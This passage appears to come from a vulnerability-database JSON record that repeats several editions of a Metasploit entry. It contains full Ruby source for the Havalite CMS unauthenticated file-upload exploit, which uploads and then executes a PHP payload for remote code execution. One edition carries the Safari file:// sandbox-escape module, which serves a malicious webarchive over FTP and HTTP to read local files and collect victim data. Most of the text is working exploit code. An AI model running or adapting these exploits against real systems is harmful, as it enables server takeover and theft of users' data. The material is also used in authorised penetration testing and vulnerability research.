Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-17T09:38:20", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.7, "vector": "NONE", "modified": "2019-09-17T09:38:20"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2143-1", "OPENSUSE-SU-2019:2142-1", "OPENSUSE-SU-2019:2139-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1925-1:B2568", "DEBIAN:DLA-1924-1:DDBDB", "DEBIAN:DSA-4524-1:F2646", "DEBIAN:DLA-1922-1:6BFF9", "DEBIAN:DLA-1923-1:2C401"]}, {"type": "redhat", "idList": ["RHSA-2019:2782", "RHSA-2019:2781", "RHSA-2019:2780", "RHSA-2019:2779", "RHSA-2019:2778", "RHSA-2019:2777", "RHSA-2019:2775", "RHSA-2019:2774", "RHSA-2019:2773"]}, {"type": "ubuntu", "idList": ["USN-4133-1", "USN-4124-2"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2773"]}], "modified": "2019-09-17T09:38:20"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-17T09:38:20", "differentElements": ["modified", "published"], "edition": 100}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-17T11:38:48", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.7, "vector": "NONE", "modified": "2019-09-17T11:38:48"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2143-1", "OPENSUSE-SU-2019:2142-1", "OPENSUSE-SU-2019:2139-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1925-1:B2568", "DEBIAN:DLA-1924-1:DDBDB", "DEBIAN:DSA-4524-1:F2646", "DEBIAN:DLA-1922-1:6BFF9", "DEBIAN:DLA-1923-1:2C401"]}, {"type": "redhat", "idList": ["RHSA-2019:2782", "RHSA-2019:2781", "RHSA-2019:2780", "RHSA-2019:2779", "RHSA-2019:2778", "RHSA-2019:2777", "RHSA-2019:2775", "RHSA-2019:2774", "RHSA-2019:2773"]}, {"type": "ubuntu", "idList": ["USN-4133-1", "USN-4124-2"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2773"]}], "modified": "2019-09-17T11:38:48"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-17T11:38:48", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 101}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "6ab0282c84b1bdacba91d2c2c5bcd9b7", "type": "metasploit", "bulletinFamily": "exploit", "title": "Mac OS X Safari file:// Redirection Sandbox Escape", "description": "Versions of Safari before 8.0.6, 7.1.6, and 6.2.6 are vulnerable to a \"state management issue\" that allows a browser window to be navigated to a file:// URL. By dropping and loading a malicious .webarchive file, an attacker can read arbitrary files, inject cross-domain Javascript, and silently install Safari extensions.\n", "published": "2015-06-23T21:15:50", "modified": "2017-07-24T13:26:21", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1155", "https://support.apple.com/en-us/HT204826"], "cvelist": ["CVE-2015-1155"], "lastseen": "2019-09-23T07:53:50", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2019-09-23T07:53:50"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2015-1155"]}, {"type": "zdi", "idList": ["ZDI-15-228"]}, {"type": "myhack58", "idList": ["MYHACK58:62201564175"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/GATHER/SAFARI_FILE_URL_NAVIGATION"]}, {"type": "nessus", "idList": ["MACOSX_SAFARI8_0_6.NASL", "FEDORA_2016-9EC1850FFF.NASL", "FEDORA_2016-A4FCB02D6B.NASL", "FEDORA_2016-5D6D75DBEA.NASL", "FEDORA_2016-FDE7FFCB77.NASL", "UBUNTU_USN-2937-1.NASL", "FEDORA_2016-1A7F7FFB58.NASL", "OPENSUSE-2016-412.NASL", "OPENSUSE-2016-340.NASL"]}, {"type": "threatpost", "idList": ["THREATPOST:91159E4B96B0C8149A93B2FF3CF47C01"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805613", "OPENVAS:1361412562310842701", "OPENVAS:1361412562310131278", "OPENVAS:1361412562310807724", "OPENVAS:1361412562310807720", "OPENVAS:1361412562310807742", "OPENVAS:1361412562310131282"]}, {"type": "kaspersky", "idList": ["KLA10573"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14452", "SECURITYVULNS:DOC:32012", "SECURITYVULNS:VULN:14561", "SECURITYVULNS:DOC:32265"]}, {"type": "ubuntu", "idList": ["USN-2937-1"]}], "modified": "2019-09-23T07:53:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/safari_file_url_navigation.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/exploit/format/webarchive'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::FtpServer\n include Msf::Exploit::Format::Webarchive\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Mac OS X Safari file:// Redirection Sandbox Escape',\n 'Description' => %q{\n Versions of Safari before 8.0.6, 7.1.6, and 6.2.6 are vulnerable to a\n \"state management issue\" that allows a browser window to be navigated\n to a file:// URL. By dropping and loading a malicious .webarchive file,\n an attacker can read arbitrary files, inject cross-domain Javascript, and\n silently install Safari extensions.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'joev' # discovery, module\n ],\n 'References' => [\n ['ZDI', '15-228'],\n ['CVE', '2015-1155'],\n ['URL', 'https://support.apple.com/en-us/HT204826']\n ],\n 'Platform' => 'osx',\n 'Targets' =>\n [\n [ 'Mac OS X', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jan 16 2014'\n ))\n\n\n register_options([\n OptString.new(\"URIPATH\", [false, 'The URI to use for this exploit (default is random)']),\n OptPort.new('SRVPORT', [true, \"The local port to use for the FTP server\", 8081]),\n OptPort.new('HTTPPORT', [true, \"The HTTP server port\", 8080])\n ])\n end\n\n def lookup_lhost(c=nil)\n # Get the source address\n if datastore['SRVHOST'] == '0.0.0.0'\n Rex::Socket.source_address( c || '50.50.50.50')\n else\n datastore['SRVHOST']\n end\n end\n\n def on_request_uri(cli, req)\n if req.method =~ /post/i\n data_str = req.body.to_s\n begin\n data = JSON::parse(data_str || '')\n file = record_data(data, cli)\n send_response(cli, '')\n print_good \"data #{data.keys.join(',')} received and stored to #{file}\"\n rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up\n file = record_data(data_str, cli)\n print_error \"Invalid JSON stored in #{file}\"\n send_response(cli, '')\n end\n elsif req.uri =~ /#{popup_path}$/\n send_response(cli, 200, 'OK', popup_html)\n else\n send_response(cli, 200, 'OK', exploit_html)\n end\n end\n\n def ftp_user\n @ftp_user ||= Rex::Text.rand_text_alpha(6)\n end\n\n def ftp_pass\n @ftp_pass ||= Rex::Text.rand_text_alpha(6)\n end\n\n def exploit_html\n %Q|\n <html><body>\n <script>\n window.onclick = function() {\n window.open(window.location+'/#{popup_path}', 'x', 'width=1,height=1');\n }\n </script>\n The page has moved. <a href='#'>Click here</a> to be redirected.\n </body></html>\n |\n end\n\n def ftp_url\n \"ftp://#{ftp_user}:#{ftp_pass}@#{lookup_lhost}:#{datastore['SRVPORT']}\"\n end\n\n def popup_html\n %Q|\n <script>\n\n function perform() {\n if (arguments.length > 0) {\n var nextArgs = Array.prototype.slice.call(arguments, 1);\n arguments[0]();\n setTimeout(function() {\n perform.apply(null, nextArgs);\n }, 300);\n }\n }\n\n perform(\n function() { opener.location = 'http://localhost:99999'; },\n function() { history.pushState.call(opener.history, {}, {}, 'file:///'); },\n function() { opener.location = 'about:blank' },\n function() { opener.history.back(); },\n function() { window.location = '#{ftp_url}'; },\n function() { opener.location = 'http://localhost:99998'; },\n function() {\n history.pushState.call(\n opener.history, {}, {},\n 'file:///Volumes/#{lookup_lhost}/#{payload_name}'\n );\n },\n function() { opener.location = 'about:blank'; },\n function() { opener.history.back(); },\n function() { if (#{datastore['INSTALL_EXTENSION']}) { opener.postMessage('EXT', '*'); window.location = '#{apple_extension_url}'; } else { window.close(); } }\n )\n\n </script>\n |\n end\n\n #\n # Handle FTP LIST request (send back the directory listing)\n #\n def on_client_command_list(c, arg)\n conn = establish_data_connection(c)\n if not conn\n c.put(\"425 Can't build data connection\\r\\n\")\n return\n end\n\n print_status(\"Data connection setup\")\n c.put(\"150 Here comes the directory listing\\r\\n\")\n\n print_status(\"Sending directory list via data connection #{webarchive_size}\")\n month_names = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n m = month_names[Time.now.month-1]\n d = Time.now.day\n y = Time.now.year\n\n dir = \"-rwxr-xr-x 1 ftp ftp #{webarchive_size} #{m} #{d} #{y} #{payload_name}\\r\\n\"\n print_status dir\n conn.put(dir)\n conn.close\n\n print_status(\"Directory sent ok\")\n c.put(\"226 Transfer ok\\r\\n\")\n\n return\n end\n\n #\n # Handle the FTP RETR request. This is where we transfer our actual malicious payload\n #\n def on_client_command_retr(c, arg)\n conn = establish_data_connection(c)\n if not conn\n return c.put(\"425 can't build data connection\\r\\n\")\n end\n\n print_status(\"Connection for file transfer accepted\")\n c.put(\"150 Connection accepted\\r\\n\")\n\n # Send out payload\n conn.put(webarchive)\n conn.close\n end\n\n def volume_name\n @volume_name ||= Rex::Text.rand_text_alpha(12)\n end\n\n def payload_name\n 'msf.webarchive'\n end\n\n def popup_path\n @popup_uri ||= Rex::Text.rand_text_alpha(12)\n end\n\n def webarchive\n webarchive_xml\n end\n\n def webarchive_size\n print_status \"Webarchive_SiZE=#{webarchive_xml.length}\"\n webarchive_xml.length\n end\n\n def run\n # Start the FTP server\n print_status(\"Running FTP service...\")\n start_service\n\n # Create our own HTTP server\n # We will stay in this functino until we manually terminate execution\n start_http\n end\n\n #\n # Handle the HTTP request and return a response. Code borrorwed from:\n # msf/core/exploit/http/server.rb\n #\n def start_http(opts={})\n # Ensture all dependencies are present before initializing HTTP\n use_zlib\n\n comm = datastore['ListenerComm']\n if (comm.to_s == \"local\")\n comm = ::Rex::Socket::Comm::Local\n else\n comm = nil\n end\n\n # Default the server host / port\n opts = {\n 'ServerHost' => datastore['SRVHOST'],\n 'ServerPort' => datastore['HTTPPORT'],\n 'Comm' => comm\n }.update(opts)\n\n # Start a new HTTP server\n @http_service = Rex::ServiceManager.start(\n Rex::Proto::Http::Server,\n opts['ServerPort'].to_i,\n opts['ServerHost'],\n datastore['SSL'],\n {\n 'Msf' => framework,\n 'MsfExploit' => self,\n },\n opts['Comm'],\n datastore['SSLCert']\n )\n\n @http_service.server_name = datastore['HTTP::server_name']\n\n # Default the procedure of the URI to on_request_uri if one isn't\n # provided.\n uopts = {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }.update(opts['Uri'] || {})\n\n proto = (datastore[\"SSL\"] ? \"https\" : \"http\")\n print_status(\"Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}\")\n\n if (opts['ServerHost'] == '0.0.0.0')\n print_status(\" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}\")\n end\n\n # Add path to resource\n @service_path = uopts['Path']\n @http_service.add_resource(uopts['Path'], uopts)\n\n # As long as we have the http_service object, we will keep the ftp server alive\n while @http_service\n select(nil, nil, nil, 1)\n end\n end\n\n #\n # Ensures that gzip can be used. If not, an exception is generated. The\n # exception is only raised if the DisableGzip advanced option has not been\n # set.\n #\n def use_zlib\n if !Rex::Text.zlib_present? && datastore['HTTP::compression']\n fail_with(Failure::Unknown, \"zlib support was not detected, yet the HTTP::compression option was set. Don't do that!\")\n end\n end\n\n #\n # Returns the configured (or random, if not configured) URI path\n #\n def resource_uri\n path = datastore['URIPATH'] || Rex::Text.rand_text_alphanumeric(8+rand(8))\n path = '/' + path if path !~ /^\\//\n datastore['URIPATH'] = path\n return path\n end\n\n #\n # Create an HTTP response and then send it\n #\n def send_response(cli, code, message='OK', html='')\n proto = Rex::Proto::Http::DefaultProtocol\n res = Rex::Proto::Http::Response.new(code, message, proto)\n res['Content-Type'] = 'text/html'\n res.body = html\n\n cli.send_response(res)\n end\n\n # @param [Hash] data the data to store in the log\n # @return [String] filename where we are storing the data\n def record_data(data, cli)\n name = if data.is_a?(Hash) then data.keys.first else 'data' end\n file = File.basename(name).gsub(/[^A-Za-z]/,'')\n store_loot(\n file, \"text/plain\", cli.peerhost, data, \"safari_webarchive\", \"Webarchive Collected Data\"\n )\n end\n\n #\n # Kill HTTP/FTP (shut them down and clear resources)\n #\n def cleanup\n super\n\n # Kill FTP\n stop_service\n\n # clear my resource, deregister ref, stop/close the HTTP socket\n begin\n @http_service.remove_resource(datastore['URIPATH'])\n @http_service.deref\n @http_service.stop\n @http_service.close\n @http_service = nil\n rescue\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-23T07:53:50", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 102}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-23T09:55:56", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.1, "vector": "NONE", "modified": "2019-09-23T09:55:56"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:2863", "RHSA-2019:2862", "RHSA-2019:2854", "RHSA-2019:2837", "RHSA-2019:2789", "RHSA-2019:2836", "RHSA-2019:2830", "RHSA-2019:2829", "RHSA-2019:2828", "RHSA-2019:2827"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4530-1:939B7", "DEBIAN:DLA-1929-1:430B5", "DEBIAN:DSA-4529-1:9F947", "DEBIAN:DLA-1927-1:85EEC"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2827"]}, {"type": "kitploit", "idList": ["KITPLOIT:8708017483803645203"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20190921-01-DEBUG"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:88B3739C40911AEE494A457ECD8EB065"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2156-1", "OPENSUSE-SU-2019:2155-1"]}], "modified": "2019-09-23T09:55:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-23T09:55:56", "differentElements": ["modified", "published"], "edition": 103}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "256696488d2935c452aa3214d8109c9b", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-29T17:50:07", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 0.7, "vector": "NONE", "modified": "2019-09-29T17:50:07"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:6630845352841826230", "KITPLOIT:730987502722793008"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2212-1", "OPENSUSE-SU-2019:2213-1", "OPENSUSE-SU-2019:2207-1", "OPENSUSE-SU-2019:2208-1", "OPENSUSE-SU-2019:2205-1", "OPENSUSE-SU-2019:2204-1", "OPENSUSE-SU-2019:2211-1", "OPENSUSE-SU-2019:2206-1"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1937-1:B255A", "DEBIAN:DSA-4537-1:645C5", "DEBIAN:DLA-1934-1:D1937", "DEBIAN:DLA-1935-1:31587", "DEBIAN:DLA-1936-1:CB642", "DEBIAN:DSA-4536-1:AA824", "DEBIAN:DSA-4535-1:DB4A4", "DEBIAN:DSA-4534-1:49373"]}, {"type": "freebsd", "idList": ["E917CABA-E291-11E9-89F1-152FED202BB7"]}, {"type": "ubuntu", "idList": ["USN-4141-1"]}], "modified": "2019-09-29T17:50:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 